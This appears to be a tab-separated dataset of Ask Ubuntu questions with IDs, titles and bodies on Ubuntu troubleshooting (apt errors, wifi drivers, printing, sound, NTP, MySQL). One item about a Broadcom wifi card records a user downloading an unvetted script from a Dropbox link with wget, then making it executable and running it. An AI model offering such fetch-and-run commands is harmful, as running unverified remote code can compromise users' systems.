486911	package skype i386 problem with ubuntu 14.04	if i do sudo apt-get update , it will show me : w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ trusty/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_trusty_partner_binary-i386_packages ) w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ trusty/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_trusty_partner_binary-i386_packages ) w : you may want to run apt-get update to correct these problems e : the package skype : i386 needs to be reinstalled , but i ca n't find an archive for it . sudo apt-get update gives me : e : some index files failed to download . they have been ignored , or old ones used instead .
486912	how to pause installation package in ubuntu software center	how can i pause one big installation package operation and install another small package then resume paused package again . i 'm using ubuntu software center to installing the big package . is this possible ?
486915	installing ubuntu desktop on server with only system management tools in it ?	i 'd like to install ubuntu-desktop on the server edition of ubuntu 4.04 lst . the default installation is bloated , with too many packages in it . so i tried this : sudo apt-get install -- no-install-recommends ubuntu-desktop this however , installed a desktop version with nothing on it at all . not even a power button on the upper taskbar , or a way to configure networking on the desktop , or a disk usage utility . is there a reasonable installation option , made for humans who just want a complete desktop installation with no extra software like openoffice or thunderbird ? i could not find a way to get a complete os installed without all the other stuff that i do n't need.. if not , then how can i know which packages to install to get these basic features into the minimal desktop ? searching on the dash gave me nothing other than online pages . thanks !
486916	touchpad not working with xubuntu 14.04	it seems that i have the same problem as these people asus x550ld touchpad not working/detected ubuntu 14.04 , but with asus a55vd . are there any solution yet ? on ubuntu 13.10 with xfce4 i dont have any problem . maybe i can copy some configurations file from the other partition ? copying /usr/share/x11/xorg.conf.d/* has not helped .
486917	lenovo s10 bcm 4312 ( rev 01 ) wifi not functioning	just created live usb 3 days ago and have been reading the forums here about getting wifi card to work . love the lubuntu os . here is what i have done so far : ran : sudo apt-­get update ran : sudo apt­-get upgrade ran : sudo-apt get install linux-firmware-nonfree found this thread : http : //ubuntuforums.org/showthread.php ? t=370108 then ran : wget ­-n ­-t 5 -­t 10 http : //dl.dropbox.com/u/57264241/wireless_script & & chmod +x wireless_script & & ./wireless_script ran : lspci and got this back : network controller : broadcom corporation bcm4312 802.11b/g lp­-phy ( rev 01 ) on my “preferences/additional drivers/” it reads : broadcom corporation : bcm4312 802.11b/g lp­phy this device is not working ( beneath this are two selections and the 2nd one is highlighted ) : ) using broadcom 802.11 linux sta wireless driver source from bcmwl­kernal- source ( proprietary ) ) do not use this device of note : i saw a page that listed upgrades for various cards and the 4312 was listed but not the rev 01 . ***edit- heres the link for the wireless_script command : enter link description here
486923	reinstall ubuntu 14.04 without using any image is possible ?	is it possible to reinstall 14.04 without using any image ? i just upgraded into 14.04 . there was a problem in my installation , is it possible to reinstall ubuntu without any image .
486929	load different music profiles for alsamixer or kmix	i would like to know if it 's possible to use or configure different music profiles on ( k ) ubuntu for different types of music : pop , rock , metal , rap , etc when listening to that type of music . preferably through an interface of some sort i use kmix or alsamixer . if you have any tip that could give me a lead to the right program , configuration , etc that would be great .
486932	hadoop install - login with password failed	i installed hadoop and restarted the system . then it 's not allowing me to login although i am using the correct password .
486933	how to fix mounting error for ext hdd	error mounting /dev/sdb1 at /media/geraldine/elements : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdb1 '' `` /media/geraldine/elements '' ' exited with non-zero exit status 13 : $ mftmirr does not match $ mft ( record 0 ) . failed to mount '/dev/sdb1 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation
486937	how to use gtk 3.12 in xubuntu ?	hello i am using xubuntu 14.04 . it is using gtk for applications . i want to convert all the applications to use gtk-3.12 , so that menu bar could be adjusted within the title bar . please guide me .
486938	15 computers + 1 `` master '' computer = major headache	i 'm here to ask about a research project for the math department at a university i have been just accepted to work on . the primary obstacle of the project is as follows . the project requires a set of 16 computers total . 15 of the computers will have dual monitors attached . the 16th computer would be required to act as the master computer ( or server or hub ) and be able to push different information to each monitor . so we 're basically looking at one server pushing different information to essentially 30 different monitors . is something like this at all possible ? and if so , what programs , settings , equipment , etc . would be necessary to accomplish this ? thank you in advance for any assistance in this task !
486939	is it possible to upgrade the default gtk-3.4.2 on precise to a later version ?	is it possible to upgrade the default gtk-3.4.2 on precise to a later version ? i need to use a program that requires gtk+ 3.6 as the minimum , but the gtk+ version installed is 3.4.2 . is it possible to switch to some other repo that offers a new version without breaking existing software , or at least get different versions to run side by side depending on software requirements ?
486942	installing specific version of kde	i 'm trying to make a kde system in a vm using a ubuntu 14.04 minimal cd . however , i ca n't seem to install the specific version of kde ( 4.12 ) . i 've already checked : how to install specific ubuntu packages , with exact version ? , but i 'm unsure which version is the one i want . the ubuntu packages page says : trusty ( 14.04lts ) ( kde ) : kde plasma desktop and minimal set of applications [ universe ] 5:78ubuntu13 : amd64 i386 how should i go about solving this problem ? ( fyi : i am new to ubuntu , but i 'm relatively comfortable with the terminal . )
486945	how to use telnet through wlan0 when eth0 is default device ?	i 've got a bit of a conundrum that i ca n't find anything for , so i 'm asking for help . i recently got an ar2drone from parrot . i 'd like to get some cool software on it , explore its file architecture , etc . i do n't have a laptop , just a pc . it 's got an ethernet cable running to my router , and a usb wifi dongle that is connected to the drone 's network . the drone acts as its own wifi router , allowing connections to it . so far , i 've been trying to use telnet to connect to the drone . if i turn my wired connection off , i lose internet connection , but i 'm able to telnet into the drone and issue flight commands to it with some software i have . but the moment i turn the wired back on , all of that stops working . ideally , i 'd like to be able to have my wired connection up along with the wireless connection , so that i do n't have to lose my main internet connection while working on the drone . i 'm baffled as to how to get this working though . so i 'm wondering if there is a way to force wlan0 to be my default connection , or set a specific terminal window to only use wlan0 . ifconfig output below : eth0 link encap : ethernet hwaddr 50:46:5d:6a:7e:2e inet addr:192.168.1.4 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :5246:5dff : fe6a:7e2e/64 scope : link inet6 addr : 2002:188f:63a2 : e472 : :1000/128 scope : global up broadcast running multicast mtu:1500 metric:1 rx packets:1254101 errors:0 dropped:0 overruns:0 frame:0 tx packets:649052 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1708326009 ( 1.7 gb ) tx bytes:52385599 ( 52.3 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:13050 errors:0 dropped:0 overruns:0 frame:0 tx packets:13050 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1823178 ( 1.8 mb ) tx bytes:1823178 ( 1.8 mb ) wlan0 link encap : ethernet hwaddr c4:04:15:43 : ed:6b inet addr:192.168.1.2 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :c604:15ff : fe43 : ed6b/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:22263 errors:0 dropped:0 overruns:0 frame:0 tx packets:806 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1142847 ( 1.1 mb ) tx bytes:101121 ( 101.1 kb )
486947	drivers not loaded	i run ubuntu 14.04 on an acer aspire 5740g , and my bluetooth is not recognized by the os . are there any drivers for my laptop to make it run like it should ? i 've moved from 30 years of windows just recently , and i 'm not familiar with any coding .
486949	fluxbox lightdm nautilus	i recently started using fluxbox , i 'm using lightdm as a desktop manager and was using gnome/unity before fluxbox . i 'm facing a few troubles while trying to adapt to this new window manager , the first one ( and slightly odd ) is this one : everytime i try to open nautilus , the background changes to my unity ubuntu 's background and when i right click on desktop 's background ( to reload fluxbox which was my first try to fix the problem ) a unity folder options menu pops up ( the one `` new folder '' , `` paste '' etc . options ) . there 's another thing that i 'm not really sure about : is it ok that i use lightdm just for the login screen ? i simply change the window manager there to fluxbox and log in my computer normally with fluxbox . thanks in advance .
486950	why ca n't i send emails from the command line to my gmail account	i 'm using the command : echo `` test if email can be sent from server '' | mail -s `` test '' myaccount @ gmail.com this is on an ubuntu server 12.04 completely up to date . to catch you up on my troubleshooting : 1 ) i have installed mailutils with the `` internet site '' option ( or whatever that internet option was ; i ca n't remember exactly what it was called off the top of my head ) . 2 ) i have added myself to the group 'mail ' . 3 ) i have checked that my isp does , in fact , block port 25 . i followed these instructions using port 587 , which is unblocked ( i 'm not sure that this has an effect on outgoing mail ; it looks like a mail server to me ) 4 ) i 've also tried echo `` test if email can be sent from server '' | sendmail -f myaccount @ gmail.com myaccount @ gmail.com , but this also appears to do nothing . 5 ) i am worried that gmail is receiving on port 587 , but that it does n't know what to do with the traffic . is this an unfounded consideration ? 6 ) my gmail user name contains a ' . ' before the ' @ gmail.com ' . is it possible that this is confusing the mail and sendmail commands ? ( edit : after some more experimenting , this is probably not the problem )
486951	skype client 's ( group ) chat not working	ubuntu 13.10 , skype client 4.2.0.13 when installed the skype client first it worked as expected ( 5 months ago ) . but for around two weeks i ca n't see some group chats ( some i can see others i ca n't ! ) anymore . i tried re-installing with deleting of the local profile ( ~/.skype ) without success . since that is not the source of the problem , i would think that it might be due to a recent system update.. but have no idea what i should do to fix this . any known fixes or am i the only one with this problem ?
486952	i have to reconnect to my wifi every time i 'm downloading or gone	every time i 'm downloading something huge , i almost always lose my internet connection . network manager says i 'm still connected wireless but pinging google.com just hangs . the same problem also often occurs after a long period of time of even just leaving my computer on . the issue has been around for years for me even when using 12.04 . the windows side never has an issue . disconnecting and reconnecting wifi from network-manager always solves the issue .
486955	unable to have internet connection with gtpl broadband	i have installed ubuntu 14.04 lts alongside windows xp . i have a wired broadband connection . the broadband connection is working ok in windows xp . but , it is not working in ubuntu 14.04 lts . what should i do to configure the same ?
486956	unable to change permissions for group on usb drives	i have newly installed ubuntu 14.04 for a media server . my problem is that i have all the media on external usb drives . the drives are write/readable by the user & files explorer but plex media server and other applications can not even read the drives . i 've read several-dozen articles and tried various chmod and chown commands but some say `` operation not permitted '' when trying to change permissions to 770 or 777 . i 've even tried to change the properties of the folders in the gui and for group access , as soon as you change to `` access files '' , `` list files only '' , or `` create and delete files '' it quickly snaps back to `` none '' . i 've reformatted the drive several times trying exfat , ntfs , fat32 , hfs+ , & ext2 but the behavior is exactly the same on each . i 've also been unable to find any way to change how it is mounted as most of the articles are for older versions of ubuntu that do n't apply any more . ( also , i make new media on a mac so i want a format that is compatible and quick -ntfs proved to be too slow on mac ) any help ?
486957	ubuntu 14.04 can not recover from lock screen or suspend but goes to black screen	i 'm using ubuntu 14.04 on hp z400 w/s . after a lock display or suspend , the screen goes black , pressing any key does n't display any box to enter my password to unlock screen or do a normal shutdown . the only thing that works is to power off . my work around is to set time out to never and lock off . still can not recover from suspend . therefore can not use suspend .
486958	how does one run unity 3d ( the full free version ) in ubuntu studio ?	how does one install unity 3d ( the full free version ) on ubuntu ? i have tried to run the program through wine 64-bit , and i get this message every time : error initializing license system . please contact support @ unity3d.com is there any way to get past this . or better yet , is there any way to get wine to run the program ?
486960	how to use root user in ubuntu 14.02 lts	i have installed ubuntu 14.02 lts alongside windows xp . during installation , i was asked only for user name and password . i was not asked for root user and password . so , when i click on root user , i encounter message , `` you do not have permission to view the contents of this folder . '' how can i create root user ? please guide me in this regard .
486963	terminal - search entire directory for keyword	i am working on a ruby on rails project so i have to manage multiple files . i think i made a syntax mistake somewhere but i 'm not sure well . it would be awesome if i could search for a keyword through the entire project directory . i 'm sure there 's some command on terminal , but i 'm not sure what it is .
486970	how do i access the files in an iso created with winarchiver	a friend from out of town recently gave me four .iso files on a usb stick . several days later i tried to access the files using 7z ; all i see in each iso is a 0-byte file named `` please open the iso file with winarchiver.txt '' . the same thing happens when i mount one of the .iso files using loopback . obviously winarchiver creates .iso files that are different from standard .iso files . does anyone know how i can access these isos using ubuntu ?
486975	apache and mysql bringing server to a crawl several times a day	i am having difficulty troubleshooting a bottleneck problem with my ubuntu 12.04 server . i run a very small intranet website off of the server . there are web requests ( soap , html , rest , etc ) at a pace of several small requests every minute , but all in all the web server is n't worked hard . the server is only used as a web server and a smb file server for a handful of users . about 10 days ago and many times a day since , the server slows to a crawl . all smb connections are temporarily dropped , ping requests time out , ssh sessions drop , and the webserver becomes unresponsive . this `` blackout '' happens for a period of anywhere from 30 seconds to a few minutes . afterward the server catches up , all requests response times and service response times return to normal . i used atop to narrow the problem down to what appears to be apache and possibly mysql pegging the server . no other processes during the blackout period raise suspicion . during these blackout periods , the number of apache processes jumps from 1-4 to 16+ processes . each process is taking 5-10 % of the cpu , so cumulatively , the cpu is pegged at 100 % . mysql is also working higher than normal , but is only at about 15 % of the cpu . i have researched the apache log files ( access.log and error.log ) for the blackout period and can not locate any suspicious or abnormal web requests or problems during that time . all the requests appear normal just before the blackout as the requests are during normal times . of course , during the blackout , no access is logged because the server is n't handling the web requests . i would think if there were one web request making the server work hard , apache would still handle all of the others fine , thus keeping the apache process count only slightly higher . the 16-20 and higher process count for apache makes me wonder why the server is n't responding to any of the requests . maybe it is another problem besides apache ? ? i am fairly confident that apache is the culprit and cause of the slowdown , yet i am not experienced enough to know how to research this further . any further advice on troubleshooting steps i should take would be help .
486976	why should i install ubuntu gnome 14.04 instead of ubuntu 14.04 with gnome-shell desktop installed ?	what would be the advantages of that ? at ubuntu gnome site it says `` ubuntu gnome is a mostly pure gnome desktop experience built from the ubuntu repositories '' , but i 'm not sure what that means exactly . i am currently using ubuntu 12.04 with gnome-shell installed . i am willing to upgrade to 14.04 . ubuntu lts has 5 years support while ubuntu gnome has 3 years . that 's what makes me think it would be better to install ubuntu 14.04 . actually , this question could be extended to any flavor of ubuntu . is there any difference between installing , let 's say , xubutu with the gnome-shell desktop and installing ubuntu gnome with xfce-desktop ?
486978	uui installed but booting as live usb	i installed ubuntu 14.04 ( i think ) on an external hdd using universal usb installer , however when i boot from the external hdd it still asks me to install .
486986	ca n't print from image viewer	when i try to print from the image viewer in ubuntu to a canon mp250 , it does nothing , it creates all the logs and no error . if i try the pdf , it creates the file without any problem , if i then try to print the pdf in the canon , it works flawlessly . no error log is created nor in error_log or syslog . this one was the jpg that failed . jun 22 22:34:20 cesar-pcs-dk-series kernel : [ 2748.663268 ] usblp0 : removed jun 22 22:34:20 cesar-pcs-dk-series udev-configure-printer : add /devices/pci0000:00/0000:00:02.1/usb1/1-4/1-4:1.1/usb/lp0 jun 22 22:34:20 cesar-pcs-dk-series udev-configure-printer : device devpath is /devices/pci0000:00/0000:00:02.1/usb1/1-4 jun 22 22:34:20 cesar-pcs-dk-series udev-configure-printer : device already handled jun 22 22:34:20 cesar-pcs-dk-series kernel : [ 2749.071400 ] usblp0 : usb bidirectional printer dev 4 if 1 alt 0 proto 2 vid 0x04a9 pid 0x173a this one was the pdf that worked jun 22 22:37:21 cesar-pcs-dk-series kernel : [ 2929.827126 ] usblp0 : removed jun 22 22:37:49 cesar-pcs-dk-series kernel : [ 2957.786877 ] usblp0 : usb bidirectional printer dev 4 if 1 alt 0 proto 2 vid 0x04a9 pid 0x173a jun 22 22:37:49 cesar-pcs-dk-series udev-configure-printer : add /devices/pci0000:00/0000:00:02.1/usb1/1-4/1-4:1.1/usb/lp0 jun 22 22:37:49 cesar-pcs-dk-series udev-configure-printer : device devpath is /devices/pci0000:00/0000:00:02.1/usb1/1-4 jun 22 22:37:49 cesar-pcs-dk-series udev-configure-printer : device already handled any help would be greatly appreciated .
486987	how to manage software that is installed from source ?	from time to time , we may have to install something from source due to various reasons . while it is fairly standard how to install software given appropriate dependencies , it is not clear to me how to manage such installation for future convenience . more specifically : what can we do to ensure an easy and clean uninstallation ( including those dependencies that are installed just before and just for the software installed from source ) ? what can we do to ensure an easy and clean upgrade of the same software , which will likely be installed from source again ? what can we do to minimize potential conflict if there are a default package ( installed using apt-get ) as well as the ( newer ) version of the package ( installed from source ) ?
486989	unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?	root @ moonlight : ~ # apt-get install openssh-server e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
486990	rand command problem	i have written turbo c++ prog . by using random command . is this random command indept . of time ? . this random number generation is a part of other problem . i am enable to use array size upto 400 . i want to use array size upto 5000 . therefore , i have used ubuntu c++ . in ubuntu , random is not working . i have used srand and rand commands.now the final output is different . in the turbo c++ program , random command is changed into srand and rand commands . nothing changed except this . pls help me ... . daniel
486992	wired internet not working	i have just installed lubuntu 14.04 yesterday . after installation the internet was working pretty well . i downloaded a couple of programs from software center . but today when i tried to open my browser , it does not work . the connection button on my panel keeps on blinking and on console it says 'access concentrator of your provider did not respond ' . i use a wired connection . please help me . i do n't have much networking knowledge .
486993	getting serious error after installing ubuntu	serious error were found while checking the disk drive for / . press i to ignore , s to skip mounting , m for manual recovery i installed ubuntu from iso file downloaded from ubuntu website using wubi
486995	how to install xwindows client in my ubuntu ?	i have established a remote connection with a server from my ubuntu from the server i 'm trying to execute a program that needs xwindows so i guess that means that my ubuntu should be able to accept xwindows data and make those graphical windows appear in my ubuntu . that 's why i need to install xwindows am i right ? ? but when i google about this , i get answers regarding 'xwindows server ' installations i guess installing the server for xwindows would n't hurt but is there a way to just install 'client ' version of xwindows ?
486996	ubuntu cups printing	i 've been fiddling with the for the whole day and could n't figure out what the problem is due to my lack of knowledge about ubuntu . it all started with me trying to set up a network printer in the command line by following a post ( previously someone has setup two network printers to this computer but it is extremely unstable - i get my printout several hours after i submitted the printing job hence i decided to setup the printer again ) : > /etc/init.d/cups stop > update-rc.d -f cupsys remove > lpstat -a now at this point lpstat -a showed me two printers i was originally connected to this computer . however after i added the server name to /etc/cups/client.conf , everthing seemed to be acting strangely : lpstat -a gives `` no such file or directory '' message . and i ca n't continue with the instructions on the post since the next one lpoptions -d printername would n't work . then i tried to uninstall cups by sudo apt-get purge cups and reinstall it by sudo apt-get install cups and started it by /etc/init.d/cups start i also noticed that in the printers setting , i could n't add printers anymore . `` sorry ! the system printing service does n't seem to be available '' is waht it says . the command lpstat gives `` lpstat : bad file descriptor '' i assume cups is just one of many ways of setting up printing . there might be more than one services ( daemon ) running ? by the way ( if this also be a hint for diagnose the problem ) : i can get to localhost:631 the cups web interface but i ca n't get into any of the links on there . i 'm getting exhausted by trying different ways that are suggested by the internet . could anyone give me a hint on whether this problem is caused by cups and the working principle of printing in ubuntu ?
486997	fix bad encoding in firefox in kubuntu 14.04	this time i have a question to which maybe some of you may find trivial ( hopefully ! ) . i 'm running firefox 30.0 in kubuntu 14.04 ( fresh install ) and i 'm having a weird problem , in some sites some symbols/logos/icons are showing terrible wrong i 'm suspecting something related to encoding but i 'm not really sure . i hope some of you have some ideas to fix this . the icons look like this : and should look like this :
487000	cant get full resolution on second monitor with nvdia geforce 210 on 14.04	i am using two samsung 1920x1080 monitors with my ubuntu 14.04 machine having an nvdia geforce 210 graphic card . the first monitor is connected to the vga port and the second monitot to the dvi port with a vga-to-dvi converter . the first monitor is showing full resolution ( 1920x1080 ) and the second is showing only 1024x768 resolution . i have installed nvidia drivers from ubuntu additional drivers but couldnt make it work .
487003	reset administrative forgotten password ?	i forgot my administrative password , and i already tried going into recovery mode , where i selected the `` drop to root shell prompt . '' i did the method of typing : `` passwd `` but then i get the `` authentication token manipulation error '' `` password unchanged . '' since it did n't allow me to change it , i typed the command : `` mount -rw -o remount / '' and then tried again changing the password but the same `` authentication token manipulation error '' `` password unchanged '' problem appeared . i do n't know what else to try . someone please help me ! thank you very much in advanced .
487004	how to add d-link dwm-156 to usb switch mode for automatic eject of driver cd / switch to modem mode ?	i am running ubuntu 13.10 , 32-bit . i had everytime need to go terminal to `` eject '' the windows driver cd , nor gone to disk & eject windows driver cd to make the d-link dwm-156 gsm modem functioning through network manager . it seems that usb mode switch is not working . but on my friend 's computer with ubuntu 14.04 , usb mode switch is working and i can connect d-link dwm-156 to mobile broadband through network manager as soon as i get in . is there any way to make usb mode switch to eject the windows driver cd of d-link dwm-156 in my ubuntu 13.10,32-bit at start up ? the lsusb output is bus 002 device 013 : id 2001 : a706 d-link corp before ejecting the cd ( modem as storage device of windows driver ) . the lsusb output is bus 002 device 005 : id 2001:7d01 d-link corp after ejecting the cd ( as modem ) . i do n't want to use the driver in the cd , as i need to send sms & find the data usages
487006	ubuntu does n't recognize samp server files	well , i took a free vps at vps.me ... .i logged into the ssh , downloaded sa-mp 0.3z server files , extracted went to samp03 and chmoded all to 777 ... i have changed rcon pw server name ... when i type ./semp03svr vps says `./samp03svr ' : no such file or directory here is screenshot what it looks like..what to do guys ? yeah , i have changed port to 13527 udp protocol , i found only that free , cause it 's free vps . ss : http : //goo.gl/2ugdri p.s . vps.me gives support only premium members .
487010	ctrl-alt-backspace kills sound in ubuntu	i 've been having intermittent sound problems with ubuntu 12.04 for some time . i believe i 've tried pretty much every suggestion on the web to fix it . sometimes it works , sometimes it does n't . finally , i 've been able to find a consistent pattern . when i first open xwindows ( i 'm using fvwm ) i have sound . then if i close xwindows using ctrl-alt-backspace and reopen it ( i do this frequently , for many reasons ) , then i have no sound with web videos etc . on the other hand , i do have some sounds . in particular , system settings - > sound - > sound effects - > alert sounds bark , etc as they are supposed to . the standard suggestion -- killing pulseaudio , restarting it , etc. , does n't do anything . having tried pretty much everything related to pulseadio i can think of , i 'm pretty sure that this is n't the source of my problem . can anybody suggest why this might be happening ? any suggestions would be enormously appreciated !
487011	why does mysqlworkbench give access denied for the wrong user ?	when i try to login with user root and port 3306 i get : your connection attempt failed for user '' from your host to server at localhost : null : access denied for user 'thufir ' @ 'localhost ' ( using password : yes ) please : 1 check that mysql is running on server localhost 2 check that mysql is running on port null ( note : 3306 is the default , but this can be changed ) 3 check the has rights to connect to localhost from your address ( mysql rights define what clients can connect to the server and from which machines ) 4 make sure you are both providing a password if needed and using the correct password for localhost connecting from the host address you 're connecting from i tried to login as mysql user root ( not system root ) . specifically , in the workbench , i typed in `` root '' for the user . yet , above , the error relates to user `` thufir , '' why ? just to double check thufir @ dur : ~ $ thufir @ dur : ~ $ mysql -u root -p -h 127.0.0.1 -p 3306 enter password : welcome to the mysql monitor . commands end with ; or \g . your mysql connection id is 58 server version : 5.5.37-0ubuntu0.14.04.1 ( ubuntu ) copyright ( c ) 2000 , 2014 , oracle and/or its affiliates . all rights reserved . oracle is a registered trademark of oracle corporation and/or its affiliates . other names may be trademarks of their respective owners . type 'help ; ' or '\h ' for help . type '\c ' to clear the current input statement . mysql > quit bye thufir @ dur : ~ $
487014	no sound in ubuntu 12.04 lts	i have installed ubuntu few weeks ago . it is working fine , but it does n't have sound . i made all upgrades , but this does n't help . how i can sound work ? ps i ca n't upgrade to 12.10 , my graphic card does n't support it . thanks !
487027	ca n't run ntpdate on ec2	i have had some serious issues with time accuracy on my ubuntu ec2 machines , with drifts of more than 60 seconds . a possible solution is running ntpdate or ntp , but i ca n't get them to work on ec2 : $ sudo ntpdate ntp.nasa.gov time-b.nist.gov 23 jun 07:17:23 ntpdate [ 3878 ] : no server suitable for synchronization found what have i tried : the ports on the specific machine i am testing are open for tcp and udp , inbound and outbound ( see below ) . i have tested this behaviour in more than one machine . i have tried different time servers . i have tried both ntpdate and ntp . any idea how to sync the time on my machines ? security groups detailed logs $ sudo ntpdate -vd ntp.nasa.gov time-b.nist.gov 23 jun 07:24:08 ntpdate [ 3890 ] : ntpdate 4.2.6p5 @ 1.2349-o wed oct 9 19:08:07 utc 2013 ( 1 ) looking for host ntp.nasa.gov and service ntp host found : ntp-nasa.arc.nasa.gov looking for host time-b.nist.gov and service ntp host found : time-b.nist.gov transmit ( 198.123.30.132 ) transmit ( 129.6.15.29 ) transmit ( 198.123.30.132 ) transmit ( 129.6.15.29 ) transmit ( 198.123.30.132 ) transmit ( 129.6.15.29 ) transmit ( 198.123.30.132 ) transmit ( 129.6.15.29 ) transmit ( 198.123.30.132 ) transmit ( 129.6.15.29 ) 198.123.30.132 : server dropped : no data 129.6.15.29 : server dropped : no data server 198.123.30.132 , port 123 stratum 0 , precision 0 , leap 00 , trust 000 refid [ 198.123.30.132 ] , delay 0.00000 , dispersion 64.00000 transmitted 4 , in filter 4 reference time : 00000000.00000000 mon , jan 1 1900 0:00:00.000 originate timestamp : 00000000.00000000 mon , jan 1 1900 0:00:00.000 transmit timestamp : d752549e.e0fc7517 mon , jun 23 2014 7:24:14.878 filter delay : 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 filter offset : 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 delay 0.00000 , dispersion 64.00000 offset 0.000000 server 129.6.15.29 , port 123 stratum 0 , precision 0 , leap 00 , trust 000 refid [ 129.6.15.29 ] , delay 0.00000 , dispersion 64.00000 transmitted 4 , in filter 4 reference time : 00000000.00000000 mon , jan 1 1900 0:00:00.000 originate timestamp : 00000000.00000000 mon , jan 1 1900 0:00:00.000 transmit timestamp : d752549f.142f86b3 mon , jun 23 2014 7:24:15.078 filter delay : 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 0.00000 filter offset : 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 0.000000 delay 0.00000 , dispersion 64.00000 offset 0.000000 23 jun 07:24:17 ntpdate [ 3890 ] : no server suitable for synchronization found
487030	is there bookmark in geany	i have c++ code with more than 10,000 lines . i am looking for any thing which store some lines . like bookmarking some lines or some functions in order to facilitate access to them ? for example a list which is bookmark lines or functions .
487032	adjust firefox and thunderbird to a high dpi touchscreen display ( retina )	if you are using a high dpi display with a resolution of 3200x1600 px you can adjust unity with a system wide menu and titlebar scaling but firefox is not really ready for this : all pages and the icons stay tiny . multiplication of system font increase and browser font increase makes system controls ( combobox , lists , drop down lists ) extremely big on many websites , where the form elements are affected by the scaling two times , so all form elements are huge ( 4x ) . emails in thunderbird are displayed tiny , so you have to use ctrl++ all the time how can i adjust firefox and thunderbird , so everything will look normal ?
487035	mv files with | xargs	i 'm just trying to move a bunch of files ( not symlinks ) out of my /etc/apache/sites-enabled folder into the /etc/apache/sites-available folder with the following : /etc/apache2/sites-enabled $ find . -maxdepth 1 -type f | xargs mv { } ../sites-available/ but i 'm an ubuntu n00b and am getting this error : mv : target `./real-file ' is not a directory where 'real-file ' is a test file i 've set up on my dev environment . i 'm trying to tidy up someone else 's mess on a production server ; - )
487036	having trouble installing softwares on my ubuntu 14.04	i am new to ubuntu . whenever i try to install a software ( codeblocks ) on the software center it tells me to check the internet connection and these errors failed to fetch http : //bd.archive.ubuntu.com/ubuntu/pool/universe/w/wxwidgets2.8/libwxbase2.8-0_2.8.12.1+dfsg-2ubuntu2_amd64.deb 403 forbidden failed to fetch http : //bd.archive.ubuntu.com/ubuntu/pool/universe/w/wxwidgets2.8/libwxgtk2.8-0_2.8.12.1+dfsg-2ubuntu2_amd64.deb 403 forbidden failed to fetch http : //bd.archive.ubuntu.com/ubuntu/pool/universe/c/codeblocks/libcodeblocks0_13.12-3_amd64.deb 403 forbidden failed to fetch http : //bd.archive.ubuntu.com/ubuntu/pool/universe/c/codeblocks/codeblocks-common_13.12-3_all.deb 403 forbidden failed to fetch http : //bd.archive.ubuntu.com/ubuntu/pool/universe/c/codeblocks/codeblocks_13.12-3_amd64.deb 403 forbidden the internet connection is fine . can somebody help me with a solution ? ( i ran sudo apt-get update , it did n't help )
487039	tasks-app - where is trello	i 'm using the tasks app on my desktop and it works a treat - i.e . it works with trello . trello integration was n't available on my touch device so i deleted the tasks and tried to reinstall . however , it now comes up with a install failed error . can someone help me - can i download a click package to install ? appreciate the work that everyone is doing on this - however , it seems i managed to break something .
487040	ableton and wine ... what happened ?	so i decided to install my copy of ableton ( v9.1 ) on my computer now that i 've upgraded to a machine that is n't ancient . however despite winehq reporting that ableton is platinum-certified , i ca n't get the dern thing to open . it crashes out just as the splash screen pops up . sometimes i see it , sometimes not . it tells me that some catastrophic error has occurred , and it needs to close . i 've tried this on two different systems running two different versions of wine ( one runs the up-to-date public distro 1.6.2 , while the machine i actually want to install it on is running the 1.7.19 ) i do n't know what to do . i 'd really just like to get this working , as my friends really like the look and feel of ableton , and i really do n't like lmms ( linux-y free audio software ) . any idea what 's going on here ? i 've found a couple of other people who seem to be having the same problem as me , but no dice on any solutions . none provided , really . specs : ubuntu 14.04 lts 8 gig ram i7-2670qm cpu @ 2.20ghz ă 8 lots of free space ... yadda yadda yadda error message : link
487041	how can install skystar 2 pci dvb on ubuntu 14.04 x86_64 ?	when i opening metv there is a message : `` there are no dvb device avilable '' . lspci -v : 01:06.0 network controller : techsan electronics co ltd b2c2 flexcopii dvb chip / technisat skystar2 dvb card ( rev 02 ) subsystem : techsan electronics co ltd b2c2 flexcopii dvb chip / technisat skystar2 dvb card flags : slow devsel , irq 19 memory at fdef0000 ( 32-bit , non-prefetchable ) [ size=64k ] i/o ports at dc00 [ size=32 ]
487043	wi-fi not browsing after using vpn	i connected a vpn ( wi-free ) so i could access some website using a different ip address , but on disconnecting to use my wireless connection back , it only connects and does not browse the internet until i connect with the vpn . i have uninstalled the vpn but the issue still occurs . i had to install it back so i can browse the internet . please does anyone know how i can get internet access back with just my wireless ?
